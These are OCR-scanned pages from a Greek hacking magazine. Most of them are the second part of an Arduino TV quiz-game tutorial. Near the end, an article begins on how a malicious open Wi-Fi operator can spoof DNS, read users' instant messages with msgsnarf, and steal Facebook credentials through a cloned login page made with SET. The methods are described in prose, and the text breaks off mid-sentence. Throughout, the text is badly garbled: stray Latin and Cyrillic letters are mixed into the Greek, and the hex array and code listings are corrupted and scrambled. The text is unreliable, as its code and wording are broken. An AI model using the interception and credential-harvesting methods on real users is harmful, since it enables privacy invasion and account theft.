бак! που θα φτιάξουμε ἐχει και κὠδικα, ἐχει και την απαραίτητη απλὀτη- 
τα, ὥστε να μπορούμε στο μέλλον να το επεκτεϊνουµε. Ας δούμε λοιπὸν 
τι έχουμε στη διἀθεσή µας. To hardware περιλαμβάνει δύο κουμπιά και 
ша ἐξοδο ασπρὀµαυρου, αναλογικού σήματος, χαμηλὴς ανάλυσης. Eno- 
μένως, то πιο тартасто παιχνἰδι εἶναι ἑνα κουϊζ ερωτήσεων-απαντήσεων. 
Σκεφτεἰτε кат! σαν то trivial, xopic τα ζάρια, αλλά µε ὁλο ro χαβαλὲ pe- 
ταξύ των αντιπάλων ;) Παιχνίδια αυτού του εἶδους υπάρχουν για ὀλες τις 
κονσόλες και εἶναι δηµοφιλἠ στις μεγάλες παρέες. Βέβαια, το δικὀ µας θα 
ἐχει σίγουρα λιγότερες ερωτήσεις, ενώ θα rou λείπουν και εντυπωσιακἁ 
εφἑ. Όλα αυτά όμως εἶναι λεπτομέρειες, αφού θα το έχουμε φτιάξει εξ 
ολοκλήρου μόνοι µας! :D 


Σχεδίαση... 


Πριν апо κάθε προγραμματιστικὀ session, προηγείται η απαραίτητη OXE- 
δίαση. Τι θέλουμε να κάνουμε; Πως θα το κάνουμε; Εφόσον τα ἐχουμε 
όλα στο μυαλὸ µας ξεκαθαρισμένα, η υλοποίηση δεν θα πάρει πολύ χρόνο 
και φυσικἁ θα γλιτώσουμε апо αρκετὲς ὧρες τροποποιήσεων και διορ- 
θώσεων στον κὠδικα. Το παιχνίδι µας λοιπὸν, θα αποτελεἰται апо τρεις 
καταστάσεις (mode). Στην αρχικἠ θα εμφανίζεται το λογότυπο του nal- 
χνιδιού, στην επὀµενη θα προβάλλονται διαδοχικά οι ερωτήσεις μαζί µε 
τις υποψήφιες απαντήσεις και στην τρίτη θα εμφανίζονται τα σκορ των 
παικτὠν και θα ανακοινώνεται ο νικητής! Πα να γίνει ευανάγνωστο TO 
πρὀγραμμὰ µας και να επιτρέπει την εὐκολη τροποποίηση και επέκταση, 
θα γράψουμε rov κώδικα κάθε κατάστασης σε διαφορετικὲς συναρτήσεις. 
Πριν προχωρήσουμε στην επεξήγηση rou κὠδικα, να σας θυμίσουμε Ori η 
βρώμικη боола της δημιουργίας του σήματος βίντεο πραγματοποιείται 
апо τη βιβλιοθήκη arduino-tvout. Θα ἦταν ωφέλιμο λοιπὀν, να ρἰξετε µια 
ματιὰ στο OXETIKÓ wiki: 


http://code.google.com/p/arduino-tvout/wiki/Welcome 


+++ 
e.s... 


TV-Bame µε το Arduino! (Part 2 of 


ЕЕЕ СС ССС 


Τέλος, έχετε υπόψη ότι ολόκληρος o φάκελος нє τον кобка του παιχνι- 
ioù µας εἶναι διαθέσιμος online: 


http://bit.ly/dh003-arduino-game-2 


'Evap&n 


Н αρχικἠ κατάσταση του παιχνιδιού θα προβάλει το λογότυπο του nal- 
χνιδιού, ενώ θα μπορεί να τυπώσει και éva σύντομο μήνυμα. Το παιχνίδι 
θα &ekivà όταν πατήσουμε κάποιο апо τα συνδεδεμένα κουμπιά, οπότε 
και το πρόγραµµα θα προχωρά στην επόμενη κατάσταση. Τον κὠδικα για 
όλα αυτά θα rov τοποθετήσουµε στη συνάρτηση intro. screen() η onoia, 
ὁπως καταλαβαίνετε, θα εἶναι και η πρώτη συνάρτηση που θα καλείται 
μέσα апо τη συνάρτηση loop()! του προγράμματος. 


Όλα κι όλα! О κὠδικας ξεκινά µε τον μηδενισμὀ rov score! Αμέσως μετὰ 
καθαρἰζουµε την οθὀνη, καλώντας τη συνάρτηση clear screen(). Στη 
συνέχεια τυπώνουμε το λογότυπο του παιχνιδιού και εμφανίζουμε δύο 
σύντομα μηνύματα. Па αυτή τη δουλειὰ χρησιμοποιούμε TIG συναρτήσεις 
TV.bitmap και TV.print. Αυτές οι συναρτήσεις, εκτὸς anó τα προς εμφάνι- 
ση δεδομένα, δέχονται και την επιθυμητή θἐση προβολής. Συγκεκριµένα, 
δέχονται δύο αριθμούς nou αντιστοιχούν στις συντεταγμένες X και Y. To 
σημεἰο μηδὲν για τον ἄξονα X βρίσκεται στο αριστερὀ акро της οθὀνης, 
ενώ για τον ἄξονα Y βρίσκεται στην πάνω πλευρά της οθόνης. Έτσι, pno- 
ρούμε va εµφανίσουμε ka8eri οπουδήποτε θέλουμε. Па παράδειγµα, για 
να εμφανιστεί το λογότυπο στο μέσο της ανώτατης γραμμἠὴς της οθὀνης, 
το τοποθετούμε στη θέση (6,0). Το μηδέν αναφέρεται στην απὀσταση rou 
λογότυπου апо την πάνω πλευρά της οθόνης. Όσο yia то 6, auró αφορά 
στην οριζὀντια τοποθέτηση και προέκυψε апо μερικὲς απλὲς πράξεις: Ap- 
х!ка αφαιρέσαμε το μήκος του λογότυπου (116 pixel) апо την οριζόντια 


i. Τη θυμόσαστε τη loop(), ἐτσι δεν εἶναι; Εἶναι µια συνάρτηση που περιλαμβάνεται σε κάθε πρόγραµµα του 
Arduino και τα περιεχόμενα της οποία εκτελούνται συνεχώς, μέχρι να σβήσουμε το Arduino. 


την πρώτη фора 
που υλοποιήσαμε 
το κύκλωμα, Xpr]- 
σιµοποιήσαμε éva 
breadboard. Αυτή 
тп фора όμως, 
χρησιμοποιήσαμε 
δύο! Θέλαμε βλέπε- 
τε να δισχωρίσουµε 
το τµήµα εισόδου 
(τα κουμπιά) апд 
εκείνο της εξόδου 
(τηλεοπτικὀ σήμα 
composite), yia 

va παίζουμε то 
άνετα ;) 


To λογότυπο του 
παιχνιδιού µας. Δεν 
µπορείτε να πείτε, 
εἰμαστε και οι πρὠ- 
τοι στο Photoshop! 


Το λογότυπο σε 
µορφή array. 
Προφανώς, το 
Arduino δεν ἐχει 
ιδέα για χειρισμό 
των bitmap. Ακρι- 
BOG γι’ αυτὀ, το 
µετατρέπουµε σε 
έναν δυαδικό niva- 
κα, όπου οι ассо! 
αντιστοιχούν σε 
κενό (λευκό) pixel 
και τα µηδενικἀ σε 
μαύρα pixel. Πα 
αυτή τη μετατροπή 
χρησιμοποιήσα- 

µε το εργαλείο 
Image2Code. 
Περισσότερα στο 


http://code.google. 
com/p/arduino- 
tvout/wiki/Bitmaps 
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arduino_bu logo.h 


Éinclude "logo.h" 
PROGMEM const unsigned char logo[] 

116, ШТ, 

ОХЕЕ, ОХЕ, ОХЕ, Ох80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
DxFF,OxFF,UxFF,O0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x7F, 0xFF,0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
ΕΤΕ, ὨΧΕῈ, ОхЕЕ, 0x00, 0x00, 0x00, 0x00, Ox1F, ΠΧΕΏ, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x3C, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x7F, OxF9, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x3C, 0x00, ΠΧΙΕ, 0x00, 0x00, 0x00, 0x00, ΠΧΕῈ, ОхЕЗ, 0x80, 0x00, 0x00, 0x00, Охоо, Охоо, 
Ох1Е, 0x00, 0x3C, 0x00, 0x00, 0x00, 0x01, ОхЕЕ, ОхЕ7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
OxlE,0x00,0x3C,0x78,0x78,0xDE, 0x03 , ΠΧΕΏ, OxOE, Ux 1E, Ox 1C, 0x7F,0Xx9F,0OxE0, 0x00, 
OxOF,0x00,0x78,0x78,0x78,0x1F,0x07,0xCO,O0x1C,O0xlE,0x3C,O0x7F,O0xSF,O0xFO0,0x00, 
DxOÜF,0x00,0x78,0x78,0x78,0x1F,0x07,0x8E,0xB8,0x9E,0x78,0x7F,O0xSF,U0xFB8,0xD00, 
Dx07,0x80,0xF0,0x78,0x78,0x3F,U0x87,0xSC,O0xFl1,0xSE,0xF0,0x70,0x1C,0x78,0x00, 
Dx07,0x80,0xF0,0x78,0x78,0x3B,U0x8F,0x38,0xE3,0xS8F,O0xE0,0x70,0x1C,0x38,0x00, 
0x03,0xCl,O0xE0,0x78,0x78,0x7B,O0xCF,0x30,0xF3, 0x9F , OxCO, 0x70, Ox 1C, 0x78, 0x00, 
Dx03,0xCl,0xEO0,0x7F,O0xF8,0x71,0xCF,0x30,0x04,0x02,0x00,0x30,0x0C,0x00,0xED0, 
DxU1,0xE3,0xCO,O0x7F,O0xF8,0x71,0xCF,0x38,0x61,0xF9,0x71,0x87,0xEl1,0xFB8,0xFU0, 
0x01, 0хЕЗ, ОхСО, ОхТЕ, ОхЕЗ, ОхЕО, ОХЕЕ, ОхЗС, ОхЕЗ, ОхЕС, 0х73, ОхСЕ, ОхЕЗ, ОХЕ”, ОхЕО, 
O0x00,0xF7,0x80,0x78,0x78,0xE0,0xE7,0xlF,O0xE3,0xSE,O0xF3,0xCF,OxF3,0xFD,OxFO, 
0x00,0xFF,0x80,0x78,0x78,0xFF,O0xE7,0xÜ0F,O0xC3,0xDE,OxF3,0xCF,OxF3,0xFD,OxFO0, 
0x00, 0x7F , 0x00, 0x78, 0x79, 0xFF,0XxF7, 0x80, ΠΧΏΒ, ΠΧΡΕ, 0xF3, 0xC1,0XxXE0, 0x78, ΧΕ, 
Dx0O0,0x7F,U0x00,0x78,0x79,0xED,0xF3,0xCO,O0xlB,OxFC,OxF3,0xD3,0xED,0xFS8,0xEU0, 
Dx0O,O0x3E,U0x00,0x78,0x79,0xED,0xFl1,0xFF,O0xFB,OxFC,OxF3,0xC7,0xCl,UxFO,U0xEU, 
0x00, ОхЗЕ, 0x00, Охоо, 0x00, 0x00, 0x00, ОхЕЕ, ОхЕВ,ОхЕЕ, ОхЕЗ,ОхСЕ,0х83,0хЕО,ОхЕО, ~ 

D 


ανάλυση της o8óvng µας (128 pixel) yia να βρούμε πόσα pixel περισσεύ- 
ουν στον οριζὀντιο ἄξονα. Μετὰ διαιρἐσαµε το πλήθος τους µε ro δύο, 
ώστε να τα µοιράσουµε στις δύο πλευρὲς του Aoyórunou. Με παρόμοιο 
τρόπο σκεφτήκαμε για ro κεντράρισμα του επὀµενου μηνύματος, EV® TO 
ὀνομα του δημιουργού τυπώνεται στο δεξιὸ акро. 


Ακολούθως, το npóypaupa καλεί την συνάρτηση wait, for input() η οποία 
περιμένει μέχρις ὁτου πατηθεἰ κάποιο κουμπί. Μέχρι να γίνει αυτὸ, το 
πρόγραμμα παραμένει «στάσιμο» και επαναλαμβάνει διαρκώς τον ἐλεγχο 
TOV κουμπιών. Με το πάτημα ενόὸς κουμπιού, το πρόγραµµα ngpvà στην 
κύρια κατάσταση, ónou τα πράγματα γίνονται πιο ενδιαφέροντα... 


Κυρίως µέρος 

Βρισκόμαστε πλέον στη συνάρτηση main, screen(). О κὠδικας εδώ, σε 
γενικὲς γραμμές, θα διαβάζει τις ερωτήσεις και τις απαντήσεις апо ёмам 
nivaka (array) µε string, θα τις τυπώνει στην οθὀνη και θα περιμένει για 


TV-Game µε το Arduino! (Part 2 of 


P 


lago.cpp lago.h 


prog char question 0[] PROGMEM 
prog char question 1[] PROGMEM 
prog char question 2[] PROGMEM 
prog char question 3[] PROGMEM 
prog char question 4[] PROGMEM 
prog char question 5[] PROGMEM 
prog char question 6[] PROGMEM = 
prog char question 7[] PROGMEM 
prog char question 8[] PROGMEM "Who invented the C programming language?"; 
prog char question 9[] PROGMEM ""S' in SET stands for..." 


"IDA Pro is a..."; 'ompiler - mpiler 


"; // Windows - Mac OS 


"giannoug uses... 


"DeltaHacker 001, MiTM by subzraw,. Facebook.com was redirected tc 


"DDOS stánds fof... 
"Linux Torvalds made which 057"; 


prog char answer 0 a[] PROGMEM = 
prog char answer 0 b[] PROGMEM 
prog char answer 1 a[] PROGMEM 
prog char answer 1 b[] PROGMEM "12 months"; 
prog char answer 2 a[] PROGMEM 
prog char answer 2 b[] PROGMEM 
prog char answer 3 a[] PROGMEM 
prog char answer 3 b[] PROGMEM "decompiler"; 
prog char answer 4 a[] PROGMEM "Windows"; 
prog_char answer_4_b[] PROGMEM "Mac OS X"; 
prog char answer 5 a[] PROGMEM = 
prog char answer 5 b[] PROGMEM 
prog char answer 6& a[] PROGMEM 
prog char answer 6 b[] PROGMEM 
prog char answer 7 a[] PROGMEM = 
prog char answer 7 b[] PROGMEM 
prog char answer 8 a[] PROGMEM 


дос char answer B ЪГ1 PROGMEM 
4 


"5.40 euros"; 
"5.50 euros"; 
"24 months"; 


"SpiralEvolution"; 
"SpringRevolution"; 
"compiler"; 


"Travel Alaska"; 

"Anchorage Alaska Travel Guide"; 
"Digital Disk operating System"; 
"Distributed Denial of Service"; 
"Unix"; 

"Linux"; 

"Dennis Richie"; 


"Bill Gates": 


το πάτημα κάποιου πλήκτρου. Σε αυτό το στάδιο, το κάθε πλήκτρο θα 
αντιστοιχεἰ στον κάθε παἰκτη και θα παἰζει πρώτος αυτὸς που θα πατάει 
το κουμπί TOU πρώτος. Στη συνέχεια, το κάθε πλήκτρο θα αντιστοιχεί σε 
ша апо τις πιθανὲς απαντήσεις. Ξέρουμε, ξἐρουμε... Εἶναι λίγο παράξενος 
αυτός ο τρόπος χειρισμού, αλλά δεν θέλαμε va περιπλέξουµε το прото 
μας παιχνίδι, µε σύνθετο hardware. 


Το παιχνίδι ξεκινάει µε µια αντίστροφη μέτρηση, για την προετοιμασία 
των χρηστῶν. Εντελώς άχρηστη λειτουργία, алла αρκετά cool! Έτσι δεν 
εἶναι; Στη συνέχεια &&kivà ἑνας βρόχος επαναλήψεων (loop). О κὠδικας 
του βρὀχου επαναλαμβάνεται τόσες φορὲς, ὁσες εἶναι και οι ερωτήσεις. 
Εἶναι φανερὸ λοιπὸν, бт! σε κάθε επανάληψη ro проүрарра τυπώνει μία 
ερώτηση μαζί ue тіс δύο πιθανές απαντήσεις και περιμένει την αντίδραση 
των παικτών. Συγκεκριµένα, αφού εμφανιστούν η ερώτηση και οι anad- 
ντήσεις, το πρόγραμμα περιμένει να πατηθεἰ κάποιο апо τα δύο κουμπιά. 
Για το okonó auró καλούμε τη συνάρτηση wait for first input(). Н εν 
λόγω συνάρτηση εκτελείται μέχρι να πατηθεί κάποιο κουμπί kai τότε ENI- 


"How much does a single DeltaHacker issue cost?"; // 


"; // Distributed Denial of Se 


6.40 = 5.50 


"What is the longest subscription one can make to Deltalacker?"; 
"What is the nickname of DeltaHacker's editor in chief?"; // S 


vice - Digital 


Μόλις πραγμα- 
τοποιήσαμε ша 
δοκιμαστική 
μεταγλώττιση. Όλα 
πήγαν кала, алла 
TO τελικό μέγεθος 
του προγράµµατος 
(του binary που 

θα μεταφερθεί στο 
Arduino) µας ἑκανε 
μεγάλη εντύπω- 
ση! Πρόκειται yia 
το μεγαλύτερο 
npóypaupa που 
φτιάξαμε ποτέ στο 
Arduino... 


VHA@KER 
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H αρχική οθόνη 
TOU παιχνιδιού µας 
κάνει AUTÓ, που 
πρέπει να κάνει 
κάθε αρχική οθόνη 
που σέβεται τον 
εαυτό της: Ерфа- 
νίζει το λογότυπο, 
μας ζητάει να 
πατήσουμε éva 
κουμπί και µας 
λέει TO ὀνομα του 
προγραμματιστήἠ/ 
δημιουργού ;) 
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στρέφει τον αριθμό «1» ἡ τον «2», ανάλογα нє το kouuni nou πατήθηκε. 
Ουσιαστικἁ, σε auró το στάδιο γίνεται η επιλογἠ rou παἰκτη nou θα np£- 
πει να απαντήσει και προφανώς, πρὀκειται για αυτόν που πάτησε πρῶτος 
το κουμπὶ του. Αμέσως μετά, το πρόγραµµα калі και пал! τη συνάρτη- 
ση wait for first input(). Αυτή τη φορά ópoc, περιμένει την απάντηση 
στην ερὠτηση. Όταν λάβει την απάντηση, καθαρίζει την οθόνη, ειδοποιεὶ 
τους παίκτες για TO αν ἦταν σωστἠ η απάντηση και ενημερώνει TO score. 
Όταν ολοκληρωθούν οι δέκα επαναλήψεις (τόσες εἶναι και οι ερωτήσεις) 
του βρὀχου, το πρὀγραμµα περνά στην τελική του φάση. Πα την ακρίβεια, 
καλεἰ τη συνάρτηση end. screen(). Апо εκεἰ, καθαρἰζεται η οθὀνη, τυπώ- 
νεται TO Score κάθε παἰκτη, ανακοινώνεται ο νικητἠς και το πρὀγραμμα 
περιμένει το πάτημα ενὸς κουμπιού, για να ξεκινήσει ауа апо την архі! 


Προβλήματα... 


Το κυριότερο πρὀβλημα αφορά στη διαθέσιμη μνήμη КАМ?. Н βιβλιοθήκη 
arduino-tvout χρησιµοποιεἰ ἑνα αρκετά µεγάλο μέρος της μνήμης σαν 
frame buffer. Επομένως, ο χώρος που απομένει για τις δικές µας pE- 
ταβλητὲς εἶναι ελάχιστος. Ката την ανάπτυξη του παιχνιδιού, υπήρξαν 
πολλές φορὲς που ro Arduino δεν ἐδειχνε τίποτα στην τηλεόραση! Eu- 
τυχώς, µε τη βοήθεια ενὸς απλού μηχανισμού, μπορούσαμε αμέσως va 
καταλάβουμε τι συνέβαινε. Εφόσον δεν φαινόταν τίποτα στην οθόνη, το 
πρὀγραμμα εἶχε αποτύχει στην αρχικοποΐηση του αντικειμένου «TV». Με 
ἄλλα λόγια, η εκτἐλεση της συνάρτησης begin() δεν eixe ολοκληρωθεί µε 
επιτυχία. Όμως, η συγκεκριμένη συνάρτηση επιστρἐφει το μηδὲν όταν 
όλα πηγαίνουν καλὰ και τον αριθμό 4 ὁταν δεν επαρκεἰ η μνήμη. Το npó- 
| γραμμὰ µας Aoinóv, έλεγχε την τιμὴ nou επέστρεφε η συνάρτηση begin() 
και αν δεν ἦταν μηδὲν, καλούσε τη συνάρτηση еггог(). Αυτή µε τη σειρἁ 
της, αναβόσβηνε ro λαμπάκι nou βρἰσκεται πάνω στο Arduino. Έτσι, όταν 
σπαταλούσαμε τη μνήμη και δεν ἦταν δυνατή η δηµιουργία rou frame 
buffer για την απεικὀνιση στην οθόνη, ειδοποιούμασταν апо το LED! 
Πάντως, yia va εξοικονοµήσουµε χώρο στη RAM, αποθηκεύσαµε ὁσες 
πληροφορίες μπορούσαμε (τις ερωτήσεις, τις πιθανὲς απαντήσεις κ.λπ) 
στη μνήμη Flash του Arduino. Θυμίζουμε πως η μνήμη Flash προορἰζεται 


2. Н μνήμη RAM του επεξεργαστή rou Arduino, ονομάζεται SRAM... 
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TV-Bame µε το Arduino! (Part 2 of 2) 
MT 


Κάπως ἐτσι -ap- 
кєта στριμωγμέ- 
va- εμφανίζονται 
о ερωτήσεις TOU 
л mm ou 9g = = παιχνιδιού, µαζί 
HE тїс πιθανές 
απαντήσεις. Nopi- 
ζουμε ότι ξέρετε 
την απάντηση για 
την ερώτηση της 
εικόνας... 


κανονικἀ για τον κὠδικα του ἰδιου του προγράμματος και η προσπἑλασή 
της καθυστερεί περισσότερο апо εκείνη της SRAM. Ωστόσο το τίμημα 
ἠταν μάλλον μικρὸ και επιβεβλημένο. 


Τέλος, πρόβλημα αποτελεί και η ἐλλειψη Ελληνικών апо την γραμματο- 
σειρὰ της βιβλιοθήκης. Μικρὸ το како, θα πείτε, και σίγουρα ὀχι npoypau- 
ратістіко. Αποτελεἰ ωστόσο γενικότερο πρὀβληµα για το ὁλο project! 


Ανάπτυξη, ανάπτυξη, ανάπτυξη... 


Σε κάθε project υπάρχουν σχεδὀν πάντα αρκετά περιθώρια εξέλιξης. То 

παιχνίδι µας για παράδειγµα, θα μπορούσε να μετράει το χρόνο nou χρει- 

ἄστηκε ο εκἁστοτε παἰκτης για να απαντήσει σε κἆθε ερώτηση. 'Eroi, 

TO score δεν θα διαμορφωνόταν µε βάση µόνο το πλήθος των σωστών 

απαντήσεων, алла και σύμφωνα µε την ταχύτητα του παἰκτη! Ακόμη, то М, 
прбүранна θα μπορούσε va διατηρεἰ uia λίστα µε ra σκορ, αξιοποιώντας Ἆ 
την ενσωματωμένη μνήμη EEPROM rou Arduino. Περιττό να πούμε От! 
о! μερακλήδες θα μπορούσαν να προσθέσουν και ηχητικἁ &p£. Ὅμως, 

το παιχνιδάκι που φτιάξαμε σήμερα δεν αποτελεὶ το μοναδικὀ που θα 

μπορούσε να υποστηρίξει η παιχνιδοµηχανἠ нас. Үпо μία έννοια λοιπόν, 

βελτίωση θα αποτελούσε και η κατασκευἠ πρόσθετων παιχνιδιών! Δεν 

θα εἰχε πλάκα va παἰζαμε то δικὀ µας φιδάκι, ἡ ακόµα καλύτερα, το δικό 

μας space invaders; Τι λέτε, θα τα καταφέρετε; Περιμένουμε να δούμε ra 

επιτεὐγματὰ σας στο forum του deltaHacker.gr! 


Game over! 
' + To παιχνίδι τελείω- 

(5 i А #2 ΟΕ Е σε. О nparog nai- 
üreg: κτης κατάφερε να 
μαζέψει 3 πόντους 
και ο δεύτερος 4. 
Νικητής εἶναι αυτός 
HE τους περισσότε- 
ρους... 
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Quiz: 


Μπορεὶς va βρεις ποιος *ogv* διαβάζει deltaHacker? 


Skill: Beginner 


Tags: BackTrack, 
WiFi, Wireless, 
Access Points, 

DNS, Spoofing, 
Message Snarfing, 
Remote Access, SET, 
Metasploit 


Δωρεάν γεύμα 


που βγαίνει ξινό! 


{ 


І bu subZrau 


pon “ 
πα 
{ = ы 
= 
- ы 


Την ελληνικότατη φράση "there ain't no 
[ such thing as a free lunch" αποκλείεται va 
μην την ἐχετε ακούσει. Σημαΐνει Ori εἶναι 
I δύσκολο -av оу: αδύνατο- να πάρετε κάτι, 
χωρίς να δώσετε кайт! ἄλλο. Αν δεχτούμε 
ότι ισχύει, τότε τι έχουμε να πούμε για τα 
| ανοικτά ασύρματα δίκτυα; Από αυτά κάποιος 
μπορεῖ και παίρνει δωρεάν πρόσβαση oro 
ΓΙ ἱντερνετ. Όμως τι δίνει ο ἴδιος κάποιος - av 
м υποθέσουμε От! δίνει κάτι; I 


=] 
mm 


PON- "ле, 


1 
і 
І 
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Αναλόγως της περίπτωσης, ισχυριζόμαστε ὁτι ο χρήστης ενὀς ανοικτού 
ασύρματου δικτύου σχεδὀν πάντα πληρώνει yia την πρόσβαση στο ivrep- 
νετ - ἑστω κι εμμέσως. Πα παράδειγµα, το ασύρματο δίκτυο που ἐχει 
στἠσει ο δήμος, οι δημότες το ¿xouv ἠδη πληρώσει μέσω των δημοτικών 
τελῶν. Ακόμη κι ἑνας σπὀνσορας va ἐχει κάνει συμφωνία µε то δήμο, 
ο χρήστης του δικτύου πληρώνει βλέποντας διαφημίσεις του onóvoo- 
pa, n.x., ката τη διαδικασία σύνδεσης µέσω ενὀὸς captive portal (http:// 
en.wikipedia.org/wiki/Captive portal). Υπάρχουν όμως και κἀποια avol- 
кта ασύρματα δίκτυα, σαν auró nou στήσαμε στο άρθρο που ξεκινά anó 
τη σελἰδα 22, ra onoia δεν εἶναι οὗτε του δήμου, οὐτε κάποιου σπὀνσορα, 
οὐτε κάποιας καφετέριας, οὐτε κάποιας εταιρείας. Εἶναι απλά εκεὶ και 
λειτουργούν κανονικότατα και παρέχουν στον οποιονδήποτε πρὀσβαση 
στο ἰντερνετ, χωρἰς καν να τον περνάνε апо captive portal. Ti στο кало 
εἶναι ἑνα τἐτοιο ασύρματο δίκτυο; Στα πολύ γρήγορα, παραθέτουμε τρεις 
πιθανὲς εξηγήσεις. 


1. Εἶναι ἑνα δίκτυο που o κἀτοχόὸς του άφησε εν γνώση TOU ανοικτό, 
ἐτσι, επειδἠ του αρέσει να προσφέρει στους συνανθρώπους του 
ὁπως κι боо µπορεἰ. Ωραίος ἄνθρωπος, δεν µπορείτε να πείτε. 


2. То ασύρματο δίκτυο εἶναι ката λάθος ανοικτὀ. О κἀτοχόςτου, βλέπε- 
τε, εἶναι εντελὠς άσχετος. Μια рёра nou ἐπαιζε µε τις ρυθμίσεις του 
router -τρομάρα του- και ψαχούλευε και πεἰραζε διάφορα πράγματα, 
anevepyonoinos την ασφάλεια του access point. Οὐτε καν κατάλαβε 
τι ἑκανε. To μόνο που τον ενδιαφἑρει εἶναι το ασύρματο δἰκτυό του 
να λειτουργεί - κι ευτυχώς λειτουργεί µια χαρά. Па ὁλους. 


3. Το δίκτυο εἰναι σκοπίμως ανοικτὀ για να "ψαρεύει” clients. Στην Ka- 
λύτερη περίπτωση ο ιδιοκτήτης TOU πειραματὶἰζεται αθώα. Στη χειρὀ- 
τερη ψάχνει για προσωπικἁ στοιχεία ἠ/και κοιτάζει nog θ΄’ αποκτήσει 
πρόσβαση στα μηχανήματα των χρηστών του δικτύου που σκόπιμα 
ἐχει στήσει. 


Όλα καλὰ pE TIG δύο πρώτες περιπτώσεις, αφού o client του αντίστοιχου 
ασύρματου δικτύου δεν διατρέχει κανέναν απολύτως κἰνδυνο. Н ката- 
σταση ὁμως αλλάζει δραµατικἀ στην τρίτη περίπτωση. Το λιγότερο που 
θα πάθει ο χρήστης ενὸς τέτοιου ασύρματου δικτύου εἶναι να γίνει εν 
αγνοία του πειραματὀζωο. Το χειρότερο όμως εἰναι ότι κινδυνεύει va xå- 
σει προσωπικἁ δεδομένα, passwords σε sites - ακόµα κι όλη την εγκατά- 
σταση του λειτουργικού που Χρησιμοποιεί, av ο επιτιθέμενος βρίσκεται 
σε ιδιαίτερα διαβολικἠ και κακὀκεφη διάθεση. Και για va σας δείξουμε τι 
εννοούμε και πόσο σοβαρά εἶναι τα πράγματα, στο παρὸν ἆρθρο θα na- 
ρουσιάσουµε μερικὲς апо τις ενέργειες που εἶναι σε θέση va κάνει ο -εν- 
δεχομένως κακοπροαἰρετος- κάτοχος ενὸς ανοικτού, ασύρματου δικτύου. 
Μάλιστα για τις ανάγκες τις παρουσἰασἠς µας θα μπούμε προσωρινά στη 
θέση του, εξ ου και η αλλαγἡ προσώπου που ακολουθεἰ. Εννοείται, τέλος, 
бт! τρέχουμε BackTrack Linux κι бт! έχουμε κάνει όλες τις προετοιμασίες 
που περιγράφονται στο άρθρο της σελίδας 22. Πάμε Aoinóv! 


Οι πολύ εὐκολες και γρήγορες 


Αναφερόμαστε σε δύο επιθέσεις που ἐχουμε ἠδη περιγράψει στο 
deltaHacker 001, συγκεκριµένα στο άρθρο που ξεκινά anó τη σελίδα 
74. H pia εἶναι το DNS spoofing µε ro dnsspoof και η ἄλλη το message 
snarfing με ro msgsnarf (kai τα δύο εργαλεία ανήκουν στο πακέτο dsniff, 
το οποίο εἰναι ἠδη εγκατεστημένο στο BackTrack). Αυτή τη фора φυσικἁ 
δεν χρειάζεται να κάνουμε ARP poisoning, αφού τα υποψήφια θύματα ἐρ- 


Δωρεάν γεύμα nou βγαίνει &ivó! 
ML 


χονται апо μόνα τους στο ипхаупна µας! Απλά, ra dnsspoof kai msgsnarf 
πρέπει va κοιτάζουν ro network interface nou έχει φτιάξει το airbase- 
ng, nou στην περἰπτωσἠ µας εἶναι ro аї0. Na πούμε εδὠ От! µε то DNS 
spoofing ra θύματα για ἄλλα site ξεκινάνε va náve κι αλλού καταλήγουν, 
ενώ χάρη στο msgsnarf o επιτιθἐµενος εἶναι σε θέση να βλέπει τις συνο- 
μιλίες instant messaging των clients του access point (AP), арке! να µην 
εἶναι κρυπτογραφημένες. Παρεμπιπτόντως, £va ἆλλο εργαλείο για την 
υποκλοπή μηνυμάτων instant messaging εἶναι ro imsniff. Αν και δεν εἶναι 
προεγκατεστηµμένο στο BackTrack υπάρχει στα repos του λειτουργικού, 
επομένως μπορεἰτε εύκολα να το εγκαταστήσετε µε ro apt-get. Δείτε ra 
σχετικά screenshots. 


Υποκλοπὲς ευαἴσθητων δεδομένων 


Εδὠ μπορούμε να χρησιμοποιήσουμε διάφορους τρόπους και τεχνικὲς 
προκειµένου va ψαρεύουμε usernames kai passowrds των χρηστῶν του 
ΑΡ. Ἑνα anó ra εργαλεἰα γι΄ αυτἠ τη δουλειὰ εἶναι το SET, av και ο δημι- 
ουργὀς του σίγουρα δεν το έφτιαξε για τέτοιους σκοποὺς. Ας γίνουμε λίγο 
πιο συγκεκριμένοι. Στο άρθρο rou deltaHacker 002 που ξεκινἁ απὀ τη 
σελίδα 86 δείξαμε nog ἑνας attacker στήνει ша σελίδα πανομοιότυπη µε 
τη σελίδα login του Facebook, στοχεύοντας φυσικά στα credentials του 
θὐματὸς του. Па να το προσελκύσει στην калпікп σελἰδα χρησιμοποιεί 
την τεχνικἠ του ARP poisoning алла και λἰγο social engineering. Αυτή τη 
φορὰ, ὁμως, ἐχοντας στον ἑλεγχό του ἑνα ολόκληρο access point οὐτε 
ARP poisoning χρειάζεται οὐτε τερτἰπια phishing. Αρκεἰ να βάλει το SET 
να του φτιάξει την πρὠτη σελἰδα rou Facebook και μετὰ να κάνει λίγο 
DNS spoofing µε ro dnsspoof, core τη στιγμὴ nou το θύμα θα πάει να 
επισκεφτεἰ то Facebook ουσιαστικά να βρεθεἰ στον τοπικὀ web server 
TOU SET. Φυσικά, μόλις ο attacker δει στο τερματικὀ του бт! καταγράφτη- 
кє username kai password θα πρέπει να σταματήσει το DNS spoofing, 
αφού αν το αφήσει το θύμα ποτὲ δεν θα μπορέσει να φτάσει στο αληθινό 


Gbt: -/incoming 
bs Help 


E rootbt: -/incoming. 


НАТ END ** 


Αυτή τη συνομιλία 
о attacker δεν 

θα έπρεπε να την 
παρακολουθεῖ. Από 
την ἀλλη, ας npó- 
σεχαν ὁσοι συνδὲ- 
θηκαν στο ανοικτὀ 
ΑΡ που ἐστησε! 
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Facebook και πολύ πιθανὸν να υποψιαστεὶ От! кат! δεν πἀει καλά. Ξέρετε 
κάτι, όμως; Ακόμη κι αν καταλάβει τι γίνεται, αν δεν πἀει αμέσως ν΄ αλ- 
λάξει το password o attacker ἰσως προλάβει να του προκαλέσει µεγάλη 
